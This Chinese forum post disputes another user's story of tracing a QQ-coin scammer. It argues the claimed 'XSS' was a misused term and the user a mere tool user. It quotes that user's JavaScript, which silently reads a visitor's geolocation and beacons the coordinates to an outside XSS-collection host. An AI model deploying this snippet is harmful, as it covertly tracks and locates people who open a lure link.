对 《(续集)来来真的来了,锤作者续集!》事件的调查

作为小白的我,看了影帝@夜陌 同学的文章《(续集)来来真的来了,锤作者续集!》确实被作者的机智震撼到了!!!(为什么叫他影帝,看完文章你就明白为什么)我自认为自己是一个阴谋论者,对任何事情都持有怀疑的态度,然后去验证自己的疑惑(下面就来揭破影帝@夜陌的一些谎言 )。


首先分析一下@夜陌 所使用的技术:
1.

影帝@夜陌 声称使用了xss,这真是天大的笑话。有必要普及一下什么事xss,xss的全名是“跨站脚本攻击(Cross Site Scripting”,从字面上就可以看明白跨站的脚本攻击,是在别人的网站上放置攻击脚本。请问影帝@夜陌 同学,你既然使用自己写的页面,为何不直接在js中调用,而是要跨站攻击呢。可见作者对有些名词还是不甚了解,只是想堆砌一些华丽装13的辞藻来哗众取宠。请问影帝同学,下面你写的代码showPosition是在哪里调用的???x.innerHTML="Geolocation is not supported by this browser.";   x.innderhtml又是什么意思呢。
[JavaScript] 纯文本查看 复制代码

function getLocation() //获取GPS定位方法
  {
  if (navigator.geolocation)
    {
    navigator.geolocation.getCurrentPosition(showPosition);
    }
  else{x.innerHTML="Geolocation is not supported by this browser.";}
  }
function showPosition(position)
  {
//alert("Latitude: " + position.coords.latitude + "Longitude: " + position.coords.longitude); //测试,注释掉
    (new Image()).src='https://0bug.cf/index.php?do=api&id={projectId}&weidu='+position.coords.latitude+'&jingdu='+position.coords.longitude; //向XSS平台发送经纬度信息
}
        
getLocation();

2.看完了影帝同学的第一个技术点,我觉得可笑至极,更验证的我开头的看法。我决定尝试添加作者qq了解事情的原委,通过某些方法,我加到了作者qq(就是那个shuaQB的人)。
影帝做完了第一步的技术铺垫之后,继续他的装13之路。
影帝为了获取作者(就是那个shuaQB的人)的定位地址肯定会将网页发给作者诱导他点击。下面是影帝自己说的↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓

开始分析影帝@夜陌 发的链接

就是一个网址跳转平台,他的真实链接是


一开始我以为这个域名的所有者是影帝@夜陌 的,分析域名信息,好又来发现是一个公司注册的,找到了公司的注册人,发现不是夜陌影帝。





思路就这么断了,接着分析一下影帝同学的源码



问题就在这,只不过是在iframe 里面加载了别人的网页而已,是为了迷惑 作者。
习惯性的打开这个re开头的二级域名



你会发现原来如此,影帝@夜陌 只是一个工具小子而已,已经完全可以证明影帝同学的第一步是装13了。是在是不想往下写了,看见影帝就胆寒。


注:抛去作者骗QB的是非曲直不论,单单影帝@夜陌 同学的文章实在写的精彩,大家看的不亦乐乎。愚民本质在这里一现无余,大部分人都是经过自己的主观判断就赞美影帝,没有经过任何的大脑思考。伟人教导我们:事实是检验真理的唯一标准。本人小白,比夜陌前辈的技术差着十万八千里,共勉。

THE END
喜欢就支持以下吧
点赞1
分享
评论 抢沙发
  • 管埋员

    昵称

  • 取消
    昵称